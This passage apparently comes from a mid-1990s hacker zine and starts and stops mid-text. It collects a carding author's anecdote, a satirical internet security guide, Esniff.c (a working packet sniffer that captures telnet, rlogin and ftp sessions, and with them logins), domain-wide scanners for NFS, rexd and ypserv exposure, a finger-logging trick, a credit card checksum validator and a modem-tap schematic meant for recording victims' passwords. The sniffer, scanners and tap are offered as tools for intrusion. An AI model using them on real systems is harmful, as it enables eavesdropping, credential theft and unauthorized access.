he had like 20-some issues, and we told him there was 44. We chatted for about 15 more minutes, just about the reasons for publishing and not publishing such an article. He said "Some little kid is going to find this article and get his fingers burned" I could tell he was kind of pressured for time, so we kind of let it go at that, and he asked for our numbers to call us back. Oh, when I first called him, I didn't tell him I had a friend on the line, and he asked, "Is there an echo here?" hahahaha. Pretty funny. We told him NTS was there. So, when he asked for our numbers, we laughed out loud. I guess he doesn't really understand the secrecy we all so dearly cheerish. He said, "Well, I have caller id, so I have your numbers anyways" Bahahhahahaha. Yeah, right. We told him we were bouncing our call through a satellite in Japan. He thought we were joking. Guess he doesn't understand boxing huh? Maybe we should show him some of Tabas's files. heh. We told him we would call him back - which we haven't yet, but soon will. By the way, he complimented me on the quality of the article and how detailed it was. :) Incidentally, for those of you who've lived in a cave, this is all in reference to an article of mine published in Phrack 44 called 'Safe and Easy Carding.' And for all of you who didn't like my article - Fuck you. Greets out to all the eleets - Later. VaxBuster '94 ------------------------------------------------------------------------------ A Guide to Internet Security: Becoming an Uebercracker and Becoming an UeberAdmin to stop Uebercrackers. Author: Christopher Klaus Date: December 5th, 1993. Version: 1.1 This is a paper will be broken into two parts, one showing 15 easy steps to becoming a uebercracker and the next part showing how to become a ueberadmin and how to stop a uebercracker. A uebercracker is a term phrased by Dan Farmer to refer to some elite (cr/h)acker that is practically impossible to keep out of the networks. Here's the steps to becoming a uebercracker. Step 1. Relax and remain calm. Remember YOU are a Uebercracker. Step 2. If you know a little Unix, you are way ahead of the crowd and skip past step 3. Step 3. You may want to buy Unix manual or book to let you know what ls,cd,cat does. Step 4. Read Usenet for the following groups: alt.irc, alt.security, comp.security.unix. Subscribe to Phrack@well.sf.ca.us to get a background in uebercracker culture. Step 5. Ask on alt.irc how to get and compile the latest IRC client and connect to IRC. Step 6. Once on IRC, join the #hack channel. (Whew, you are half-way there!) Step 7. Now, sit on #hack and send messages to everyone in the channel saying "Hi, What's up?". Be obnoxious to anyone else that joins and asks questions like "Why cant I join #warez?" Step 8. (Important Step) Send private messages to everyone asking for new bugs or holes. Here's a good pointer, look around your system for binary programs suid root (look in Unix manual from step 3 if confused). After finding a suid root binary, (ie. su, chfn, syslog), tell people you have a new bug in that program and you wrote a script for it. If they ask how it works, tell them they are "layme". Remember, YOU are a UeberCracker. Ask them to trade for their get-root scripts. Step 9. Make them send you some scripts before you send some garbage file (ie. a big core file). Tell them it is encrypted or it was messed up and you need to upload your script again. Step 10. Spend a week grabbing all the scripts you can. (Don't forget to be obnoxious on #hack otherwise people will look down on you and not give you anything.) Step 11. Hopefully you will now have at least one or two scripts that get you root on most Unixes. Grab root on your local machines, read your admin's mail, or even other user's mail, even rm log files and whatever temps you. (look in Unix manual from step 3 if confused). Step 12. A good test for true uebercrackerness is to be able to fake mail. Ask other uebercrackers how to fake mail (because they have had to pass the same test). Email your admin how "layme" he is and how you got root and how you erased his files, and have it appear coming from satan@evil.com. Step 13. Now, to pass into supreme eliteness of uebercrackerness, you brag about your exploits on #hack to everyone. (Make up stuff, Remember, YOU are a uebercracker.) Step 14. Wait a few months and have all your notes, etc ready in your room for when the FBI, Secret Service, and other law enforcement agencies confiscate your equipment. Call eff.org to complain how you were innocent and how you accidently gotten someone else's account and only looked because you were curious. (Whatever else that may help, throw at them.) Step 15. Now for the true final supreme eliteness of all uebercrackers, you go back to #hack and brag about how you were busted. YOU are finally a true Uebercracker. Now the next part of the paper is top secret. Please only pass to trusted administrators and friends and even some trusted mailing lists, Usenet groups, etc. (Make sure no one who is NOT in the inner circle of security gets this.) This is broken down on How to Become an UeberAdmin (otherwise know as a security expert) and How to stop Uebercrackers. Step 1. Read Unix manual ( a good idea for admins ). Step 2. Very Important. chmod 700 rdist; chmod 644 /etc/utmp. Install sendmail 8.6.4. You have probably stopped 60 percent of all Uebercrackers now. Rdist scripts is among the favorites for getting root by uebercrackers. Step 3. Okay, maybe you want to actually secure your machine from the elite Uebercrackers who can break into any site on Internet. Step 4. Set up your firewall to block rpc/nfs/ip-forwarding/src routing packets. (This only applies to advanced admins who have control of the router, but this will stop 90% of all uebercrackers from attempting your site.) Step 5. Apply all CERT and vendor patches to all of your machines. You have just now killed 95% of all uebercrackers. Step 6. Run a good password cracker to find open accounts and close them. Run tripwire after making sure your binaries are untouched. Run tcp_wrapper to find if a uebercracker is knocking on your machines. Run ISS to make sure that all your machines are reasonably secure as far as remote configuration (ie. your NFS exports and anon FTP site.) Step 7. If you have done all of the following, you will have stopped 99% of all uebercrackers. Congrats! (Remember, You are the admin.) Step 8. Now there is one percent of uebercrackers that have gained knowledge from reading some security expert's mail (probably gained access to his mail via NFS exports or the guest account. You know how it is, like the mechanic that always has a broken car, or the plumber that has the broken sink, the security expert usually has an open machine.) Step 9. Here is the hard part is to try to convince these security experts that they are not so above the average citizen and that by now giving out their unknown (except for the uebercrackers) security bugs, it would be a service to Internet. They do not have to post it on Usenet, but share among many other trusted people and hopefully fixes will come about and new pressure will be applied to vendors to come out with patches. Step 10. If you have gained the confidence of enough security experts, you will know be a looked up to as an elite security administrator that is able to stop most uebercrackers. The final true test for being a ueberadmin is to compile a IRC client, go onto #hack and log all the bragging and help catch the uebercrackers. If a uebercracker does get into your system, and he has used a new method you have never seen, you can probably tell your other security admins and get half of the replies like - "That bug been known for years, there just isn't any patches for it yet. Here's my fix." and the other half of the replies will be like - "Wow. That is very impressive. You have just moved up a big notch in my security circle." VERY IMPORTANT HERE: If you see anyone in Usenet's security newsgroups mention anything about that security hole, Flame him for discussing it since it could bring down Internet and all Uebercrackers will now have it and the million other reasons to keep everything secret about security. Well, this paper has shown the finer details of security on Internet. It has shown both sides of the coin. Three points I would like to make that would probably clean up most of the security problems on Internet are as the following: 1. Vendors need to make security a little higher than zero in priority. If most vendors shipped their Unixes already secure with most known bugs that have been floating around since the Internet Worm (6 years ago) fixed and patched, then most uebercrackers would be stuck as new machines get added to Internet. (I believe Uebercracker is German for "lame copy-cat that can get root with 3 year old bugs.") An interesting note is that if you probably check the mail alias for "security@vendor.com", you will find it points to /dev/null. Maybe with enough mail, it will overfill /dev/null. (Look in manual if confused.) 2. Security experts giving up the attitude that they are above the normal Internet user and try to give out information that could lead to pressure by other admins to vendors to come out with fixes and patches. Most security experts probably don't realize how far their information has already spread. 3. And probably one of the more important points is just following the steps I have outlined for Stopping a Uebercracker. Resources for Security: Many security advisories are available from anonymous ftp cert.org. Ask archie to find tcp_wrapper, security programs. For more information about ISS (Internet Security Scanner), email cklaus@shadow.net. Acknowledgments: Thanks to the crew on IRC, Dan Farmer, Wietse Venema, Alec Muffet, Scott Miles, Scott Yelich, and Henri De Valois. Copyright: This paper is Copyright 1993, 1994. Please distribute to only trusted people. If you modify, alter, disassemble, reassemble, re-engineer or have any suggestions or comments, please send them to: cklaus@shadow.net ------------------------------------------------------------------------------ /* [JOIN THE POSSE!] */ /* Esniff.c */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define ERR stderr char *malloc(); char *device, *ProgName, *LogName; FILE *LOG; int debug=0; #define NIT_DEV "/dev/nit" #define CHUNKSIZE 4096 /* device buffer size */ int if_fd = -1; int Packet[CHUNKSIZE+32]; void Pexit(err,msg) int err; char *msg; { perror(msg); exit(err); } void Zexit(err,msg) int err; char *msg; { fprintf(ERR,msg); exit(err); } #define IP ((struct ip *)Packet) #define IP_OFFSET (0x1FFF) #define SZETH (sizeof(struct ether_header)) #define IPLEN (ntohs(ip->ip_len)) #define IPHLEN (ip->ip_hl) #define TCPOFF (tcph->th_off) #define IPS (ip->ip_src) #define IPD (ip->ip_dst) #define TCPS (tcph->th_sport) #define TCPD (tcph->th_dport) #define IPeq(s,t) ((s).s_addr == (t).s_addr) #define TCPFL(FLAGS) (tcph->th_flags & (FLAGS)) #define MAXBUFLEN (128) time_t LastTIME = 0; struct CREC { struct CREC *Next, *Last; time_t Time; /* start time */ struct in_addr SRCip, DSTip; u_int SRCport, /* src/dst ports */ DSTport; u_char Data[MAXBUFLEN+2]; /* important stuff :-) */ u_int Length; /* current data length */ u_int PKcnt; /* # pkts */ u_long LASTseq; }; struct CREC *CLroot = NULL; char *Symaddr(ip) register struct in_addr ip; { register struct hostent *he = gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET); return( (he)?(he->h_name):(inet_ntoa(ip)) ); } char *TCPflags(flgs) register u_char flgs; { static char iobuf[8]; #define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-') SFL(0,TH_FIN, 'F'); SFL(1,TH_SYN, 'S'); SFL(2,TH_RST, 'R'); SFL(3,TH_PUSH,'P'); SFL(4,TH_ACK, 'A'); SFL(5,TH_URG, 'U'); iobuf[6]=0; return(iobuf); } char *SERVp(port) register u_int port; { static char buf[10]; register char *p; switch(port) { case IPPORT_LOGINSERVER: p="rlogin"; break; case IPPORT_TELNET: p="telnet"; break; case IPPORT_SMTP: p="smtp"; break; case IPPORT_FTP: p="ftp"; break; default: sprintf(buf,"%u",port); p=buf; break; } return(p); } char *Ptm(t) register time_t *t; { register char *p = ctime(t); p[strlen(p)-6]=0; /* strip " YYYY\n" */ return(p); } char *NOWtm() { time_t tm; time(&tm); return( Ptm(&tm) ); } #define MAX(a,b) (((a)>(b))?(a):(b)) #define MIN(a,b) (((a)<(b))?(a):(b)) /* add an item */ #define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \ register struct CREC *CLtmp = \ (struct CREC *)malloc(sizeof(struct CREC)); \ time( &(CLtmp->Time) ); \ CLtmp->SRCip.s_addr = SIP.s_addr; \ CLtmp->DSTip.s_addr = DIP.s_addr; \ CLtmp->SRCport = SPORT; \ CLtmp->DSTport = DPORT; \ CLtmp->Length = MIN(LEN,MAXBUFLEN); \ bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \ CLtmp->PKcnt = 1; \ CLtmp->Next = CLroot; \ CLtmp->Last = NULL; \ CLroot = CLtmp; \ } register struct CREC *GET_NODE(Sip,SP,Dip,DP) register struct in_addr Sip,Dip; register u_int SP,DP; { register struct CREC *CLr = CLroot; while(CLr != NULL) { if( (CLr->SRCport == SP) && (CLr->DSTport == DP) && IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) ) break; CLr = CLr->Next; } return(CLr); } #define ADDDATA_NODE(CL,DATA,LEN) { \ bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \ CL->Length += LEN; \ } #define PR_DATA(dp,ln) { \ register u_char lastc=0; \ while(ln-- >0) { \ if(*dp < 32) { \ switch(*dp) { \ case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \ break; \ case '\r': \ case '\n': fprintf(LOG,"\n : "); \ break; \ default : fprintf(LOG,"^%c", (*dp + 64)); \ break; \ } \ } else { \ if(isprint(*dp)) fputc(*dp,LOG); \ else fprintf(LOG,"(%d)",*dp); \ } \ lastc = *dp++; \ } \ fflush(LOG); \ } void END_NODE(CLe,d,dl,msg) register struct CREC *CLe; register u_char *d; register int dl; register char *msg; { fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time)); fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport)); fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport)); fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n", NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg); fprintf(LOG," DATA: "); { register u_int i = CLe->Length; register u_char *p = CLe->Data; PR_DATA(p,i); PR_DATA(d,dl); } fprintf(LOG,"\n-- \n"); fflush(LOG); if(CLe->Next != NULL) CLe->Next->Last = CLe->Last; if(CLe->Last != NULL) CLe->Last->Next = CLe->Next; else CLroot = CLe->Next; free(CLe); } /* 30 mins (x 60 seconds) */ #define IDLE_TIMEOUT 1800 #define IDLE_NODE() { \ time_t tm; \ time(&tm); \ if(LastTIMENext; \ if(CLe->Time ether_type); if(EtherType < 0x600) { EtherType = *(u_short *)(cp + SZETH + 6); cp+=8; pktlen-=8; } if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */ return; } /* ugh, gotta do an alignment :-( */ bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH)); ip = (struct ip *)Packet; if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */ return; tcph = (struct tcphdr *)(Packet + IPHLEN); if(!( (TCPD == IPPORT_TELNET) || (TCPD == IPPORT_LOGINSERVER) || (TCPD == IPPORT_FTP) )) return; { register struct CREC *CLm; register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4)); register u_char *p = (u_char *)Packet; p += ((IPHLEN * 4) + (TCPOFF * 4)); if(debug) { fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length); fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS)); fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD)); } if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) { CLm->PKcnt++; if(length>0) if( (CLm->Length + length) < MAXBUFLEN ) { ADDDATA_NODE( CLm, p,length); } else { END_NODE( CLm, p,length, "DATA LIMIT"); } if(TCPFL(TH_FIN|TH_RST)) { END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" ); } } else { if(TCPFL(TH_SYN)) { ADD_NODE(IPS,IPD,TCPS,TCPD,p,length); } } IDLE_NODE(); } } /* signal handler */ void death() { register struct CREC *CLe; while(CLe=CLroot) END_NODE( CLe, (u_char *)NULL,0, "SIGNAL"); fprintf(LOG,"\nLog ended at => %s\n",NOWtm()); fflush(LOG); if(LOG != stdout) fclose(LOG); exit(1); } /* opens network interface, performs ioctls and reads from it, * passing data to filter function */ void do_it() { int cc; char *buf; u_short sp_ts_len; if(!(buf=malloc(CHUNKSIZE))) Pexit(1,"Eth: malloc"); /* this /dev/nit initialization code pinched from etherfind */ { struct strioctl si; struct ifreq ifr; struct timeval timeout; u_int chunksize = CHUNKSIZE; u_long if_flags = NI_PROMISC; if((if_fd = open(NIT_DEV, O_RDONLY)) < 0) Pexit(1,"Eth: nit open"); if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0) Pexit(1,"Eth: ioctl (I_SRDOPT)"); si.ic_timout = INFTIM; if(ioctl(if_fd, I_PUSH, "nbuf") < 0) Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")"); timeout.tv_sec = 1; timeout.tv_usec = 0; si.ic_cmd = NIOCSTIME; si.ic_len = sizeof(timeout); si.ic_dp = (char *)&timeout; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)"); si.ic_cmd = NIOCSCHUNK; si.ic_len = sizeof(chunksize); si.ic_dp = (char *)&chunksize; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)"); strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name)); ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0'; si.ic_cmd = NIOCBIND; si.ic_len = sizeof(ifr); si.ic_dp = (char *)𝔦 if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)"); si.ic_cmd = NIOCSFLAGS; si.ic_len = sizeof(if_flags); si.ic_dp = (char *)&if_flags; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)"); if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0) Pexit(1,"Eth: ioctl (I_FLUSH)"); } while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) { register char *bp = buf, *bufstop = (buf + cc); while (bp < bufstop) { register char *cp = bp; register struct nit_bufhdr *hdrp; hdrp = (struct nit_bufhdr *)cp; cp += sizeof(struct nit_bufhdr); bp += hdrp->nhb_totlen; filter(cp, (u_long)hdrp->nhb_msglen); } } Pexit((-1),"Eth: read"); } /* Authorize your proogie,generate your own password and uncomment here */ /* #define AUTHPASSWD "EloiZgZejWyms" */ void getauth() { char *buf,*getpass(),*crypt(); char pwd[21],prmpt[81]; strcpy(pwd,AUTHPASSWD); sprintf(prmpt,"(%s)UP? ",ProgName); buf=getpass(prmpt); if(strcmp(pwd,crypt(buf,pwd))) exit(1); } */ void main(argc, argv) int argc; char **argv; { char cbuf[BUFSIZ]; struct ifconf ifc; int s, ac=1, backg=0; ProgName=argv[0]; /* getauth(); */ LOG=NULL; device=NULL; while((acifr_name; } fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV); fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout", (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n"); if(!LOG) LOG=stdout; signal(SIGINT, death); signal(SIGTERM,death); signal(SIGKILL,death); signal(SIGQUIT,death); if(backg && debug) { fprintf(ERR,"[Cannot bg with debug on]\n"); backg=0; } if(backg) { register int s; if((s=fork())>0) { fprintf(ERR,"[pid %d]\n",s); exit(0); } else if(s<0) Pexit(1,"fork"); if( (s=open("/dev/tty",O_RDWR))>0 ) { ioctl(s,TIOCNOTTY,(char *)NULL); close(s); } } fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid()); fflush(LOG); do_it(); } ------------------------------------------------------------------------------ #! /bin/nawk -f # validcc.awk - validate credit card # { # validate CardNo number="" CardNo = $0 for (indig = 1; indig <= length(CardNo); indig++) { dig = substr(CardNo, indig, 1) if (dig ~ /^[0-9]$/) number = number dig else if (dig != " ") { print "bad character in CardNo" | "cat >&2" break } } digit1 = substr(number, 1, 1) cclen = length(number) if (digit1 == "3") { print "Sorry, we do not take American Express" | "cat >&2" # if (cclen != 15) # print "wrong length for CardNo" | "cat >&2" } else if (digit1 == "4") { # visa if (cclen != 13 && cclen != 16) print "wrong length for CardNo" | "cat >&2" } else if (digit1 == "5") { # master card if (cclen != 16) print "wrong length for CardNo" | "cat >&2" } else print "unknown credit card" | "cat >&2" if (cclen == 13) bias = 0 else bias = 1 for (llen = 1; llen <= cclen; llen++) { cdigit = digit = substr(number, llen, 1) if (((llen-1+bias)%2) == 1) # double every second digit cdigit *= 2 if (cdigit > 9) cdigit -= 9 # compensate ... csum += cdigit # ... add up all the digits } if ((csum%10) != 0) print "bad CardNo" | "cat >&2" } ------------------------------------------------------------------------------ /* File: bch2.c ====== Encoder/Decoder of binary primitive BCH codes ====== Robert Morelos-Zaragoza, University of Hawaii 5/19/92 This program computes the generator polynomial of the code by using cycle sets modulo n, n = 2^m - 1. (Part of this program is adapted from a Reed-Solomon encoder/decoder program, 'rs.c', for the binary case. rs.c was created by Simon Rockliff, University of Adelaide 21/9/89) Main variables: m = order of the field GF(2**m) n = 2**m - 1 = length t = error correcting capability d = 2*t + 1 = designed minimum distance k = n - deg(g(x)) = dimension p[] = primitive polynomial to generate GF(2**m) (read from least to most significant coefficient) g[] = generator polynomial alpha_to [] = log table in GF(2**m) index_of[] = antilog table in GF(2**m) data[] = data polynomial bb[] = redundancy polynomial = x**(n-k) data[] modulo g[] numerr = number of errors errpos[] = error positions recd[] = received polynomial decerror = number of decoding errors ( in MESSAGE positions) */ #include #include int m, n, k, t, d ; int p [20] ; /* irreducible polynomial */ int alpha_to [1024], index_of [1024], g [1024] ; int recd [1024], data [1024], bb [1024] ; int numerr, errpos [1024], decerror = 0 ; int seed; void read_p() /* Read primitive polynomial of degree m */ { register int i; printf("Enter m and primitive polynomial p(x): "); scanf("%d", &m); for (i=0; i<=m; i++) scanf("%d", &p[i]); printf("p(x) = "); for (i=0; i<=m; i++) printf("%1d", p[i]); printf("\n"); n = (int)(pow(2.0,(double) m)) - 1; } void generate_gf() /* generate GF(2**m) from the irreducible polynomial p(X) in p[0]..p[m] lookup tables: index->polynomial form alpha_to[] contains j=alpha**i; polynomial form -> index form index_of[j=alpha**i] = i alpha=2 is the primitive element of GF(2**m) */ { register int i, mask ; mask = 1 ; alpha_to[m] = 0 ; for (i=0; i>= 1 ; for (i=m+1; i= mask) alpha_to[i] = alpha_to[m] ^ ((alpha_to[i-1]^mask)<<1) ; else alpha_to[i] = alpha_to[i-1]<<1 ; index_of[alpha_to[i]] = i ; } index_of[0] = -1 ; } void gen_poly() /* Compute generator polynomial of BCH code of length n=2^m - 1 */ { register int ii, jj, ll, kaux; int test, aux, nocycles, root, noterms, rdncy; int cycle[256][11], size[256], min[128], zeros[256]; /* Generate cycle sets modulo n, n = 2^m - 1 */ cycle[0][0] = 0; size[0] = 1; cycle[1][0] = 1; size[1] = 1; jj = 1; /* cycle set index */ printf("Computing cycle sets modulo %d ...\n", n); do { /* Generate the jj-th cycle set */ ii = 0; do { ii++; cycle[jj][ii] = (cycle[jj][ii-1]*2) % n; size[jj]++; aux = (cycle[jj][ii]*2) % n; } while ( aux != cycle[jj][0] ); printf(" %d ", jj); if (jj && ( (jj % 10) == 0)) printf("\n"); /* Next cycle set representative */ ll = 0; do { ll++; test = 0; for (ii=1; ((ii<=jj) && (!test)); ii++)/* Examine previous cycle sets */ for (kaux=0; ((kaux " if $verbose; &resolve("$root.$i"); } # # Do the work # sub resolve { local($name) = @_; # ip address if ($name =~ /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/) { ($a,$b,$c,$d) = split(/\./, $name); @ip = ($a,$b,$c,$d); ($name) = gethostbyaddr(pack("C4", @ip), &AF_INET); } else { ($name, $aliases, $type, $len, @ip) = gethostbyname($name); ($a,$b,$c,$d) = unpack('C4',$ip[0]); } if ($name && @ip) { print "$a.$b.$c.$d\t$name\n"; system("if ping $name 5 > /dev/null ; then\nif rpcinfo -u $name 100005 > /dev/null ; then showmount -e $name\nfi\nif rpcinfo -t $name 100017 > /dev/null ; then echo \"Running rexd.\"\nfi\nif rpcinfo -u $name 100004 > /dev/null ; then echo \"R unning ypserv.\"\nfi\nfi"); } else { print "unable to resolve address\n" if $verbose; } } sub AF_INET {2;} ------------------------------------------------------------------------------ #!/bin/sh #rpc.chk 1.0 # # Make sure you have got a newer version of Bourne Shell (SVR2 or newer) # that supports functions. It's usually located in /bin/sh5 (under ULTRIX OS) # or /bin/sh (Sun OS, RS/6000 etc) If it's located elsewhere, feel free to # change the magic number, indicating the type of executable Bourne Shell. # # The script obtains via nslookup utility a list of hostnames from a nameserver # and checks every entry of the list for active rexd procedures as well as # ypserver procedures. The output is a list of the sites that run those # daemons and are insecure. # -yo. domainname=$1 umask 022 PATH=/bin:/usr/bin:/usr/ucb:/usr/etc:/usr/local/bin ; export PATH # # Function collects a list of sites # from a nameserver. Make sure you've got the nslookup utility. # get_list() { ( echo set type=ns echo $domainname ) | nslookup | egrep "nameserv" | cut -d= -f2> .tmp$$ 2>/dev/null if [ ! -s .tmp$$ ]; then echo "No such domain" >&2 echo "Nothing to scan" >&2 exit 1 fi for serv in `cat .tmp$$`;do ( echo server $serv echo ls $domainname ) | nslookup > .file$$ 2>/dev/null lines=`cat .file$$ | wc -l` tail -`expr $lines - 7` .file$$ | cut -d" " -f2 > .file.tmp # .file sed -e "s/$/.$domainname/" .file.tmp > .hosts$$ rm -rf .file* .tmp$$ sort .hosts$$ | uniq -q >> HOSTS$$; rm -rf .hosts$$ done tr 'A-Z' 'a-z' HOSTS.$domainname;rm -rf HOSTS$$ } # Function rpc_calls() { for entry in `cat HOSTS.$domainname`; do ( rpcinfo -t $entry ypserv >/dev/null && echo $entry runs YPSERV || exit 1 # Error! ) >> .log 2>/dev/null ( rpcinfo -t $entry rex >/dev/null && echo $entry runs REXD || exit 1 # Error ! ) >> .log 2>/dev/null done } # Main if [ "$domainname" = '' ]; then echo "Usage $0 domainname" >&2 exit 1 fi get_list echo "Checking $domainname domain" > .log echo "*****************************" >> .log echo "Totally `cat HOSTS.$domainname | wc -l` sites to scan" >> .log echo "******************************" >> .log echo "started at `date`" >> .log echo "******************************" >> .log rpc_calls echo "******************************" >> .log echo "finished at `date`" >> .log ------------------------------------------------------------------------------ The Ultimate Finger/Mail Hack by Emanon (a.k.a. WinterHawk) This program will keep a log of who fingers you on your local host and tell you when the finger was performed. As an added tease, it will send email to the person doing the fingering telling them that you know who they are and you know when they fingered you, even when you are not logged on. Easy to follow steps: [This is a comment] [ALL OF THE FOLLOWING FILES ARE TO GO IN YOUR HOME DIRECTORY!!!] [Get to your home directory] % cd [Make a file called .mailscript and include the following source code] [MAKE THE APPROPRIATE CHANGES TO PATH NAMES WHERE NECESSARY!!!] % cat .mailscript #!bin/sh MYNAME=your_account_name # JUST YOUR LOCAL ACCOUNT NAME, NOT THE FULL ADDRESS!!! HOME=/your/full/home/path/goes/here SUCKER=`ps -fau | grep 'finger $MYNAME' | grep -v 'grep' | awk '{print $1}'` echo "$SUCKER fingered you on `date`" | cat >> $HOME/.fingerlog echo "$MYNAME knows that you fingered him on `date`" | mail -s 'Sucker!' $SUCKER [On some systems, the `u' flag is not necessary for the `ps' command] [On most systems, you will not have to (re)declare the $HOME variable] [If you do not want the fingerer to receive email, remove the last line] [You may wish to hard code your account name, rather than using the variable] [Make a file called fingerLog.c and include the following source code] [MAKE THE APPROPRIATE CHANGES TO PATH NAMES WHERE NECESSARY!!!] % cat fingerLog.c #include #include main() { int x, pipeHandle, planHandle; char * pipeFile = "/your/full/home/path/goes/here/.plan"; char * planFile = "/your/full/home/path/goes/here/.realplan"; char buf[1024]; for(;;){ pipeHandle=open(pipeFile,O_WRONLY); planHandle=open(planFile,O_RDONLY); while((x=read(planHandle,buf,sizeof(buf)))>0) write(pipeHandle,buf,x); system("sh /your/full/home/path/goes/here/.mailscript"); close(pipeHandle); close(planHandle); sleep(3);} } [Compile the fingerLog.c program] % cc fingerLog.c -o fingerLog [You may want to use a more inconspicuous name for the executable file] [Move you .plan file to .realplan] % mv .plan .realplan [Make a piped FIFO .plan file] % mknod .plan p [Allow people to view your bogus .plan file] % chmod 755 .plan [Run fingerLog in the background] % nohup fingerLog > /dev/null & [Optional clean up] % rm fingerLog.c PROBLEMS: On some machines, the [ps -fau] option will not reveal what account a person is actually fingering. In this case, you can remove all instances of the $MYNAME variable from the [.mailscript] file. However, it is entirely possible that two people may be performing a finger at the same time and the script may log the wrong one. If you do have to omit the $MYNAME variable, I strongly suggest that you also remove the email option. And, you might as well change the [ps] command to a simple [w], like so: SUCKER=`w | grep 'finger' | grep -v 'grep' | awk '{print $1}'` Also, if the system you are on is bogged down with a lot of processes, the script may not find the fingerer before the process is terminated, thus logging the time without an appropriate account name, and not sending the email. So far, there has only been one system where I could only use the program to log the times that I had been fingered, no account names and no email :( That's It! Of course, this is not a perfect bug free program. It should run all the time [even when you are not logged on] so you only need to run it once. If it does quit for some reason [like when the sysop kills it], you can simply restart it. For those of you privileged enough to be using Korn shell, you can add the following code to your [.profile] that will check to see if fingerLog is running whenever you log in. If it isn't, it will restart it for you. I'm sure that this can be modified to work with Bourne and C shell (if it doesn't already), but I'll leave that up to you. ps x | grep 'fingerLog' | grep -v 'grep' > /dev/null if (( $? != 0 )); then nohup fingerLog > /dev/null & fi Let me say this one more time so that there is no confusion, "This only works on your LOCAL host!!!" People who finger you from a remote host will see your [.realplan] file, just like everyone else, but they will *NOT* receive the email. It will appear in your .fingerlog as an empty account name. If and when someone does revise this to work with remote hosts (most likely using the netstat command), please email me a copy at: tdavis@garnet.acns.fsu.edu As a matter of fact, there is a lot of room for improvement. If *ANYONE* makes *ANY* revisions, please have the courtesy to email me a copy and explain what changes you have made. Thanks. Enjoy! Assembly: WinterHawk bows humbly to Cat and Fuzz. ------------------------------------------------------------------------------ +----------------------+ | Building A Modem Tap | | by: phigan | +----------------------+ Many of you have probably heard of, seen, or maybe even built a phone tap. Not a very difficult device to make. I got the idea of making a modem tap from a computer underground book that I saw over at my local Spy Headquarters (I'm not sure if this is a store that is only here in 602 or not but its got shitloads of spy equipment such as video surveillance, fake ids, useful literature, fake bombs, very small bugs, etc.). First of all, here is the schematic for making a phone tap to record to cassette. Parts ~~~~~ 1) RCA-type jack to tape recorder mic input 1) 10k(p)ohm : 20k(s) ohm transformer 1) .005 mfd capacitor Schematic ~~~~~~~~~ To line +--------------------------+ | | | | | | (+-----------+ | | | RCA | Transformer | | | jack +^^^^^^^^^^^^^+ | | +-------------+ | | | | | | | +----------------+ | | | +----------||------------+ | .005 mfd | | The main purpose for a modem tap such as this is to set it up at someone's house or maybe an office building that you know dials out with modems and you can record all the keystrokes that have been entered. With this next schematic, you can simply play the cassette back through your modem and easily print out the entire session having logged passwords and so on. Good way of getting CBI accounts also. Parts ~~~~~ 1) RCA type jack from tape recorder ext. speaker 1) 100 Ohm restistor 1) bell-type phone jack (@) Schematic ~~~~~~~~~ +-------+ ____________________ RCA jack ----| Modem | @----<_________/\/\/\_____>(+ +-------+ phone 100 Ohm jack When you have a recording of your victim's session, simply fire up your terminal program and treat it as you would any other modem connection. If you are smart enough, you may even be able to combine these two and make an acoustic modem module for a regular laptop modem (hint hint payphones hint hint). I have seen this done in a mail-order mag. It said that the acoustic module could handle 9600 baud and if you have good enough rubber cups (like they did on their model) then you will have absolutely no line noise. Anyway, if you have any problems, feel free to email me at 15660@ef.gc.maricopa.edu or you may find me on IRC as phigan on channels #phreak, #hack, or sometimes #c-64. ,,, (o o) .---------------oOO---(_)---OOo---------------. | PHiGAN/6o2 IBM/Amiga/8-Bit | | ANSi/VGA/Coding Member: NWPAC | | Hi-Res/8-Bit/Musix SysOp: | | 15660@ef.gc.maricopa.edu -The PhAcS Machine | `---------------------------------------------' ------------------------------------------------------------------------------ Phone Tapping with a personal stereo !!! brought to you by Harlequin Here in the UK, we have a reasonably secure phone system, mainly because the whole system is run by 